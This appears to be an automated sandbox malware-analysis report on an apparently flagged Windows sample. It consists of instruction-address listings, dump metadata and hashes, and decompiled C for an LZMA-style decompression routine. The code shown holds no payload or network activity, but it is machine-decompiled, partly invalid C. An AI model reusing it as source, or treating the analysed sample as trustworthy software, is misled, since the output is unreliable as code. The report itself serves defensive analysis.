                                                              0x004073bb
                                                              0x004073be
                                                              0x004073c8
                                                              0x004073cb
                                                              0x004073cb
                                                              0x00000000
                                                              0x004073cb
                                                              0x0040739b
                                                              0x0040739e
                                                              0x004073a2
                                                              0x004073a5
                                                              0x004073a5
                                                              0x004073a8
                                                              0x00000000
                                                              0x00000000
                                                              0x00407452
                                                              0x00407456
                                                              0x00407474
                                                              0x00407474
                                                              0x00407474
                                                              0x0040747b
                                                              0x00407482
                                                              0x00407489
                                                              0x00407489
                                                              0x00000000
                                                              0x00407489
                                                              0x00407458
                                                              0x0040745b
                                                              0x0040745e
                                                              0x00407461
                                                              0x00407468
                                                              0x004073ac
                                                              0x004073ac
                                                              0x004073af
                                                              0x00000000
                                                              0x00000000
                                                              0x00407543
                                                              0x00407546
                                                              0x00000000
                                                              0x00000000
                                                              0x0040717d
                                                              0x0040717f
                                                              0x00407186
                                                              0x00407187
                                                              0x00407189
                                                              0x0040718c
                                                              0x00000000
                                                              0x00000000
                                                              0x00407194
                                                              0x00407197
                                                              0x0040719a
                                                              0x0040719c
                                                              0x0040719e
                                                              0x0040719e
                                                              0x0040719f
                                                              0x004071a2
                                                              0x004071a9
                                                              0x004071ac
                                                              0x004071ba
                                                              0x00000000
                                                              0x00000000
                                                              0x00407490
                                                              0x00407490
                                                              0x00407493
                                                              0x0040749a
                                                              0x00000000
                                                              0x00000000
                                                              0x0040749f
                                                              0x0040749f
                                                              0x004074a3
                                                              0x004075db
                                                              0x00000000
                                                              0x004075db
                                                              0x004074a9
                                                              0x004074ac
                                                              0x004074af
                                                              0x004074b3
                                                              0x004074b6
                                                              0x004074bc
                                                              0x004074be
                                                              0x004074be
                                                              0x004074be
                                                              0x004074c1
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c7
                                                              0x004074c7
                                                              0x004074cb
                                                              0x0040752b
                                                              0x0040752e
                                                              0x00407533
                                                              0x00407534
                                                              0x00407536
                                                              0x00407538
                                                              0x0040753b
                                                              0x00407447
                                                              0x00407447
                                                              0x00000000
                                                              0x00407447
                                                              0x004074cd
                                                              0x004074d3
                                                              0x004074d6
                                                              0x004074d9
                                                              0x004074dc
                                                              0x004074df
                                                              0x004074e2
                                                              0x004074e5
                                                              0x004074e8
                                                              0x004074eb
                                                              0x004074ee
                                                              0x00407507
                                                              0x0040750a
                                                              0x0040750d
                                                              0x00407510
                                                              0x00407514
                                                              0x00407516
                                                              0x00407516
                                                              0x00407517
                                                              0x0040751a
                                                              0x004074f0
                                                              0x004074f0
                                                              0x004074f8
                                                              0x004074fd
                                                              0x004074ff
                                                              0x00407502
                                                              0x00407502
                                                              0x0040751d
                                                              0x00407524
                                                              0x00000000
                                                              0x00407526
                                                              0x00000000
                                                              0x00407526
                                                              0x00000000
                                                              0x004071c2
                                                              0x004071c5
                                                              0x004071fb
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732e
                                                              0x0040732e
                                                              0x00407331
                                                              0x00407333
                                                              0x004075bd
                                                              0x00000000
                                                              0x004075bd
                                                              0x00407339
                                                              0x0040733c
                                                              0x00000000
                                                              0x00000000
                                                              0x00407342
                                                              0x00407346
                                                              0x00407349
                                                              0x00407349
                                                              0x00407349
                                                              0x00000000
                                                              0x00407349
                                                              0x004071c7
                                                              0x004071c9
                                                              0x004071cb
                                                              0x004071cd
                                                              0x004071d0
                                                              0x004071d1
                                                              0x004071d3
                                                              0x004071d5
                                                              0x004071d8
                                                              0x004071db
                                                              0x004071f1
                                                              0x004071f6
                                                              0x0040722e
                                                              0x0040722e
                                                              0x00407232
                                                              0x0040725e
                                                              0x00407260
                                                              0x00407267
                                                              0x0040726a
                                                              0x0040726d
                                                              0x0040726d
                                                              0x00407272
                                                              0x00407272
                                                              0x00407274
                                                              0x00407277
                                                              0x0040727e
                                                              0x00407281
                                                              0x004072ae
                                                              0x004072ae
                                                              0x004072b1
                                                              0x004072b4
                                                              0x00407328
                                                              0x00407328
                                                              0x00407328
                                                              0x00000000
                                                              0x00407328
                                                              0x004072b6
                                                              0x004072bc
                                                              0x004072bf
                                                              0x004072c2
                                                              0x004072c5
                                                              0x004072c8
                                                              0x004072cb
                                                              0x004072ce
                                                              0x004072d1
                                                              0x004072d4
                                                              0x004072d7
                                                              0x004072f0
                                                              0x004072f2
                                                              0x004072f5
                                                              0x004072f6
                                                              0x004072f9
                                                              0x004072fb
                                                              0x004072fe
                                                              0x00407300
                                                              0x00407302
                                                              0x00407305
                                                              0x00407307
                                                              0x0040730a
                                                              0x0040730e
                                                              0x00407310
                                                              0x00407310
                                                              0x00407311
                                                              0x00407314
                                                              0x00407317
                                                              0x004072d9
                                                              0x004072d9
                                                              0x004072e1
                                                              0x004072e6
                                                              0x004072e8
                                                              0x004072eb
                                                              0x004072eb
                                                              0x0040731a
                                                              0x00407321
                                                              0x004072ab
                                                              0x004072ab
                                                              0x004072ab
                                                              0x004072ab
                                                              0x00000000
                                                              0x00407323
                                                              0x00000000
                                                              0x00407323
                                                              0x00407321
                                                              0x00407234
                                                              0x00407237
                                                              0x00407239
                                                              0x0040723c
                                                              0x0040723f
                                                              0x00407242
                                                              0x00407244
                                                              0x00407247
                                                              0x0040724a
                                                              0x0040724a
                                                              0x0040724d
                                                              0x0040724d
                                                              0x00407250
                                                              0x00407257
                                                              0x0040722b
                                                              0x0040722b
                                                              0x0040722b
                                                              0x0040722b
                                                              0x00000000
                                                              0x00407259
                                                              0x00000000
                                                              0x00407259
                                                              0x00407257
                                                              0x004071dd
                                                              0x004071e0
                                                              0x004071e2
                                                              0x004071e5
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f44
                                                              0x00406f44
                                                              0x00406f48
                                                              0x0040758d
                                                              0x00000000
                                                              0x0040758d
                                                              0x00406f4e
                                                              0x00406f51
                                                              0x00406f54
                                                              0x00406f57
                                                              0x00406f5a
                                                              0x00406f5d
                                                              0x00406f60
                                                              0x00406f62
                                                              0x00406f65
                                                              0x00406f68
                                                              0x00406f6b
                                                              0x00406f6d
                                                              0x00406f6d
                                                              0x00406f6d
                                                              0x00000000
                                                              0x00000000
                                                              0x004070cf
                                                              0x004070cf
                                                              0x004070d3
                                                              0x00407599
                                                              0x00000000
                                                              0x00407599
                                                              0x004070d9
                                                              0x004070dc
                                                              0x004070df
                                                              0x004070e2
                                                              0x004070e4
                                                              0x004070e4
                                                              0x004070e4
                                                              0x004070e7
                                                              0x004070ea
                                                              0x004070ed
                                                              0x004070f0
                                                              0x004070f3
                                                              0x004070f6
                                                              0x004070f7
                                                              0x004070f9
                                                              0x004070f9
                                                              0x004070f9
                                                              0x004070fc
                                                              0x004070ff
                                                              0x00407102
                                                              0x00407105
                                                              0x00407105
                                                              0x00407105
                                                              0x00407108
                                                              0x0040710a
                                                              0x0040710a
                                                              0x00000000
                                                              0x00000000
                                                              0x0040734c
                                                              0x0040734c
                                                              0x0040734c
                                                              0x00407350
                                                              0x00000000
                                                              0x00000000
                                                              0x00407356
                                                              0x00407359
                                                              0x0040735c
                                                              0x0040735f
                                                              0x00407361
                                                              0x00407361
                                                              0x00407361
                                                              0x00407364
                                                              0x00407367
                                                              0x0040736a
                                                              0x0040736d
                                                              0x00407370
                                                              0x00407373
                                                              0x00407374
                                                              0x00407376
                                                              0x00407376
                                                              0x00407376
                                                              0x00407379
                                                              0x0040737c
                                                              0x0040737f
                                                              0x00407382
                                                              0x00407385
                                                              0x00407389
                                                              0x0040738b
                                                              0x0040738e
                                                              0x00000000
                                                              0x00407390
                                                              0x0040710d
                                                              0x0040710d
                                                              0x00000000
                                                              0x0040710d
                                                              0x0040738e
                                                              0x004075c3
                                                              0x004075e5
                                                              0x004075eb
                                                              0x004075ed
                                                              0x004075f4
                                                              0x00000000
                                                              0x00000000
                                                              0x00406bf2
                                                              0x004075fa
                                                              0x004075fa
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                              • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                                                              • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                              • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 98%
                                                              			E00406FFE() {
                                                              				signed int _t539;
                                                              				unsigned short _t540;
                                                              				signed int _t541;
                                                              				void _t542;
                                                              				signed int _t543;
                                                              				signed int _t544;
                                                              				signed int _t573;
                                                              				signed int _t576;
                                                              				signed int _t597;
                                                              				signed int* _t614;
                                                              				void* _t621;
                                                              
                                                              				L0:
                                                              				while(1) {
                                                              					L0:
                                                              					if( *(_t621 - 0x40) != 1) {
                                                              						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                                              						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                                              						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                                              						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                                                              						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                                              						_t539 =  *(_t621 - 4) + 0x664;
                                                              						 *(_t621 - 0x58) = _t539;
                                                              						goto L68;
                                                              					} else {
                                                              						 *(__ebp - 0x84) = 8;
                                                              						while(1) {
                                                              							L132:
                                                              							 *(_t621 - 0x54) = _t614;
                                                              							while(1) {
                                                              								L133:
                                                              								_t540 =  *_t614;
                                                              								_t597 = _t540 & 0x0000ffff;
                                                              								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                              								if( *(_t621 - 0xc) >= _t573) {
                                                              									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                              									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                              									 *(_t621 - 0x40) = 1;
                                                              									_t541 = _t540 - (_t540 >> 5);
                                                              									 *_t614 = _t541;
                                                              								} else {
                                                              									 *(_t621 - 0x10) = _t573;
                                                              									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                              									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                              								}
                                                              								if( *(_t621 - 0x10) >= 0x1000000) {
                                                              									goto L139;
                                                              								}
                                                              								L137:
                                                              								if( *(_t621 - 0x6c) == 0) {
                                                              									 *(_t621 - 0x88) = 5;
                                                              									L170:
                                                              									_t576 = 0x22;
                                                              									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                                              									_t544 = 0;
                                                              									L172:
                                                              									return _t544;
                                                              								}
                                                              								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                                              								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                              								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                              								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                              								L139:
                                                              								_t542 =  *(_t621 - 0x84);
                                                              								while(1) {
                                                              									 *(_t621 - 0x88) = _t542;
                                                              									while(1) {
                                                              										L1:
                                                              										_t543 =  *(_t621 - 0x88);
                                                              										if(_t543 > 0x1c) {
                                                              											break;
                                                              										}
                                                              										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
                                                              											case 0:
                                                              												if( *(_t621 - 0x6c) == 0) {
                                                              													goto L170;
                                                              												}
                                                              												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                              												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                              												_t543 =  *( *(_t621 - 0x70));
                                                              												if(_t543 > 0xe1) {
                                                              													goto L171;
                                                              												}
                                                              												_t547 = _t543 & 0x000000ff;
                                                              												_push(0x2d);
                                                              												asm("cdq");
                                                              												_pop(_t578);
                                                              												_push(9);
                                                              												_pop(_t579);
                                                              												_t617 = _t547 / _t578;
                                                              												_t549 = _t547 % _t578 & 0x000000ff;
                                                              												asm("cdq");
                                                              												_t612 = _t549 % _t579 & 0x000000ff;
                                                              												 *(_t621 - 0x3c) = _t612;
                                                              												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                                              												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                                              												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                                              												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                                              													L10:
                                                              													if(_t620 == 0) {
                                                              														L12:
                                                              														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                                              														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                              														goto L15;
                                                              													} else {
                                                              														goto L11;
                                                              													}
                                                              													do {
                                                              														L11:
                                                              														_t620 = _t620 - 1;
                                                              														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                                              													} while (_t620 != 0);
                                                              													goto L12;
                                                              												}
                                                              												if( *(_t621 - 4) != 0) {
                                                              													GlobalFree( *(_t621 - 4));
                                                              												}
                                                              												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                                              												 *(_t621 - 4) = _t543;
                                                              												if(_t543 == 0) {
                                                              													goto L171;
                                                              												} else {
                                                              													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                                              													goto L10;
                                                              												}
                                                              											case 1:
                                                              												L13:
                                                              												__eflags =  *(_t621 - 0x6c);
                                                              												if( *(_t621 - 0x6c) == 0) {
                                                              													 *(_t621 - 0x88) = 1;
                                                              													goto L170;
                                                              												}
                                                              												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                              												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                                              												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                              												_t45 = _t621 - 0x48;
                                                              												 *_t45 =  *(_t621 - 0x48) + 1;
                                                              												__eflags =  *_t45;
                                                              												L15:
                                                              												if( *(_t621 - 0x48) < 4) {
                                                              													goto L13;
                                                              												}
                                                              												_t555 =  *(_t621 - 0x40);
                                                              												if(_t555 ==  *(_t621 - 0x74)) {
                                                              													L20:
                                                              													 *(_t621 - 0x48) = 5;
                                                              													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                                              													goto L23;
                                                              												}
                                                              												 *(_t621 - 0x74) = _t555;
                                                              												if( *(_t621 - 8) != 0) {
                                                              													GlobalFree( *(_t621 - 8));
                                                              												}
                                                              												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                                              												 *(_t621 - 8) = _t543;
                                                              												if(_t543 == 0) {
                                                              													goto L171;
                                                              												} else {
                                                              													goto L20;
                                                              												}
                                                              											case 2:
                                                              												L24:
                                                              												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                                              												 *(_t621 - 0x84) = 6;
                                                              												 *(_t621 - 0x4c) = _t562;
                                                              												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                                              												goto L132;
                                                              											case 3:
                                                              												L21:
                                                              												__eflags =  *(_t621 - 0x6c);
                                                              												if( *(_t621 - 0x6c) == 0) {
                                                              													 *(_t621 - 0x88) = 3;
                                                              													goto L170;
                                                              												}
                                                              												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                              												_t67 = _t621 - 0x70;
                                                              												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                                              												__eflags =  *_t67;
                                                              												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                              												L23:
                                                              												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                                              												if( *(_t621 - 0x48) != 0) {
                                                              													goto L21;
                                                              												}
                                                              												goto L24;
                                                              											case 4:
                                                              												L133:
                                                              												_t540 =  *_t614;
                                                              												_t597 = _t540 & 0x0000ffff;
                                                              												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                              												if( *(_t621 - 0xc) >= _t573) {
                                                              													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                              													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                              													 *(_t621 - 0x40) = 1;
                                                              													_t541 = _t540 - (_t540 >> 5);
                                                              													 *_t614 = _t541;
                                                              												} else {
                                                              													 *(_t621 - 0x10) = _t573;
                                                              													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                              													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                              												}
                                                              												if( *(_t621 - 0x10) >= 0x1000000) {
                                                              													goto L139;
                                                              												}
                                                              											case 5:
                                                              												goto L137;
                                                              											case 6:
                                                              												__edx = 0;
                                                              												__eflags =  *(__ebp - 0x40);
                                                              												if( *(__ebp - 0x40) != 0) {
                                                              													__eax =  *(__ebp - 4);
                                                              													__ecx =  *(__ebp - 0x38);
                                                              													 *(__ebp - 0x34) = 1;
                                                              													 *(__ebp - 0x84) = 7;
                                                              													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                              													L132:
                                                              													 *(_t621 - 0x54) = _t614;
                                                              													goto L133;
                                                              												}
                                                              												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                              												__esi =  *(__ebp - 0x60);
                                                              												__cl = 8;
                                                              												__cl = 8 -  *(__ebp - 0x3c);
                                                              												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                              												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                              												__ecx =  *(__ebp - 0x3c);
                                                              												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                              												__ecx =  *(__ebp - 4);
                                                              												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                              												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                              												__eflags =  *(__ebp - 0x38) - 4;
                                                              												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                              												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                              												if( *(__ebp - 0x38) >= 4) {
                                                              													__eflags =  *(__ebp - 0x38) - 0xa;
                                                              													if( *(__ebp - 0x38) >= 0xa) {
                                                              														_t98 = __ebp - 0x38;
                                                              														 *_t98 =  *(__ebp - 0x38) - 6;
                                                              														__eflags =  *_t98;
                                                              													} else {
                                                              														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                              													}
                                                              												} else {
                                                              													 *(__ebp - 0x38) = 0;
                                                              												}
                                                              												__eflags =  *(__ebp - 0x34) - __edx;
                                                              												if( *(__ebp - 0x34) == __edx) {
                                                              													__ebx = 0;
                                                              													__ebx = 1;
                                                              													goto L61;
                                                              												} else {
                                                              													__eax =  *(__ebp - 0x14);
                                                              													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                              													__eflags = __eax -  *(__ebp - 0x74);
                                                              													if(__eax >=  *(__ebp - 0x74)) {
                                                              														__eax = __eax +  *(__ebp - 0x74);
                                                              														__eflags = __eax;
                                                              													}
                                                              													__ecx =  *(__ebp - 8);
                                                              													__ebx = 0;
                                                              													__ebx = 1;
                                                              													__al =  *((intOrPtr*)(__eax + __ecx));
                                                              													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                              													goto L41;
                                                              												}
                                                              											case 7:
                                                              												goto L0;
                                                              											case 8:
                                                              												__eflags =  *(__ebp - 0x40);
                                                              												if( *(__ebp - 0x40) != 0) {
                                                              													__eax =  *(__ebp - 4);
                                                              													__ecx =  *(__ebp - 0x38);
                                                              													 *(__ebp - 0x84) = 0xa;
                                                              													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                              												} else {
                                                              													__eax =  *(__ebp - 0x38);
                                                              													__ecx =  *(__ebp - 4);
                                                              													__eax =  *(__ebp - 0x38) + 0xf;
                                                              													 *(__ebp - 0x84) = 9;
                                                              													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                              													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                              												}
                                                              												while(1) {
                                                              													L132:
                                                              													 *(_t621 - 0x54) = _t614;
                                                              													goto L133;
                                                              												}
                                                              											case 9:
                                                              												__eflags =  *(__ebp - 0x40);
                                                              												if( *(__ebp - 0x40) != 0) {
                                                              													goto L89;
                                                              												}
                                                              												__eflags =  *(__ebp - 0x60);
                                                              												if( *(__ebp - 0x60) == 0) {
                                                              													goto L171;
                                                              												}
                                                              												__eax = 0;
                                                              												__eflags =  *(__ebp - 0x38) - 7;
                                                              												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                              												__eflags = _t258;
                                                              												0 | _t258 = _t258 + _t258 + 9;
                                                              												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                              												goto L75;
                                                              											case 0xa:
                                                              												__eflags =  *(__ebp - 0x40);
                                                              												if( *(__ebp - 0x40) != 0) {
                                                              													__eax =  *(__ebp - 4);
                                                              													__ecx =  *(__ebp - 0x38);
                                                              													 *(__ebp - 0x84) = 0xb;
                                                              													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                              													while(1) {
                                                              														L132:
                                                              														 *(_t621 - 0x54) = _t614;
                                                              														goto L133;
                                                              													}
                                                              												}
                                                              												__eax =  *(__ebp - 0x28);
                                                              												goto L88;
                                                              											case 0xb:
                                                              												__eflags =  *(__ebp - 0x40);
                                                              												if( *(__ebp - 0x40) != 0) {
                                                              													__ecx =  *(__ebp - 0x24);
                                                              													__eax =  *(__ebp - 0x20);
                                                              													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                              												} else {
                                                              													__eax =  *(__ebp - 0x24);
                                                              												}
                                                              												__ecx =  *(__ebp - 0x28);
                                                              												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                              												L88:
                                                              												__ecx =  *(__ebp - 0x2c);
                                                              												 *(__ebp - 0x2c) = __eax;
                                                              												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                              												L89:
                                                              												__eax =  *(__ebp - 4);
                                                              												 *(__ebp - 0x80) = 0x15;
                                                              												__eax =  *(__ebp - 4) + 0xa68;
                                                              												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                              												goto L68;
                                                              											case 0xc:
                                                              												L99:
                                                              												__eflags =  *(__ebp - 0x6c);
                                                              												if( *(__ebp - 0x6c) == 0) {
                                                              													 *(__ebp - 0x88) = 0xc;
                                                              													goto L170;
                                                              												}
                                                              												__ecx =  *(__ebp - 0x70);
                                                              												__eax =  *(__ebp - 0xc);
                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												_t334 = __ebp - 0x70;
                                                              												 *_t334 =  *(__ebp - 0x70) + 1;
                                                              												__eflags =  *_t334;
                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												__eax =  *(__ebp - 0x2c);
                                                              												goto L101;
                                                              											case 0xd:
                                                              												L37:
                                                              												__eflags =  *(__ebp - 0x6c);
                                                              												if( *(__ebp - 0x6c) == 0) {
                                                              													 *(__ebp - 0x88) = 0xd;
                                                              													goto L170;
                                                              												}
                                                              												__ecx =  *(__ebp - 0x70);
                                                              												__eax =  *(__ebp - 0xc);
                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												_t122 = __ebp - 0x70;
                                                              												 *_t122 =  *(__ebp - 0x70) + 1;
                                                              												__eflags =  *_t122;
                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												L39:
                                                              												__eax =  *(__ebp - 0x40);
                                                              												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                              												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                              													goto L48;
                                                              												}
                                                              												__eflags = __ebx - 0x100;
                                                              												if(__ebx >= 0x100) {
                                                              													goto L54;
                                                              												}
                                                              												L41:
                                                              												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                              												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                              												__ecx =  *(__ebp - 0x58);
                                                              												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                              												 *(__ebp - 0x48) = __eax;
                                                              												__eax = __eax + 1;
                                                              												__eax = __eax << 8;
                                                              												__eax = __eax + __ebx;
                                                              												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                              												__ax =  *__esi;
                                                              												 *(__ebp - 0x54) = __esi;
                                                              												__edx = __ax & 0x0000ffff;
                                                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                              												__eflags =  *(__ebp - 0xc) - __ecx;
                                                              												if( *(__ebp - 0xc) >= __ecx) {
                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                              													__cx = __ax;
                                                              													 *(__ebp - 0x40) = 1;
                                                              													__cx = __ax >> 5;
                                                              													__eflags = __eax;
                                                              													__ebx = __ebx + __ebx + 1;
                                                              													 *__esi = __ax;
                                                              												} else {
                                                              													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                              													 *(__ebp - 0x10) = __ecx;
                                                              													0x800 = 0x800 - __edx;
                                                              													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                              													__ebx = __ebx + __ebx;
                                                              													 *__esi = __cx;
                                                              												}
                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              												 *(__ebp - 0x44) = __ebx;
                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                              													goto L39;
                                                              												} else {
                                                              													goto L37;
                                                              												}
                                                              											case 0xe:
                                                              												L46:
                                                              												__eflags =  *(__ebp - 0x6c);
                                                              												if( *(__ebp - 0x6c) == 0) {
                                                              													 *(__ebp - 0x88) = 0xe;
                                                              													goto L170;
                                                              												}
